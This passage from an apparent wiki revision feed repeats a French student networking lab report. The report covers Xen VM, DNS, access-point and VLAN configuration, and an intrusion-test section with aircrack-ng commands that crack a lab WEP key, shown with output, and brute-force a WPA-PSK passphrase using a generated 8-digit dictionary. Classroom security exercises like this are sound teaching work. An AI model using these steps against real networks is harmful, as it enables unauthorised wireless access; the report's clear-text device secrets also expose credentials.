Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56399</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56399"/>
				<updated>2021-11-19T09:41:13Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56398</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56398"/>
				<updated>2021-11-19T09:39:50Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Connexion sur le disque de virtualisation : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
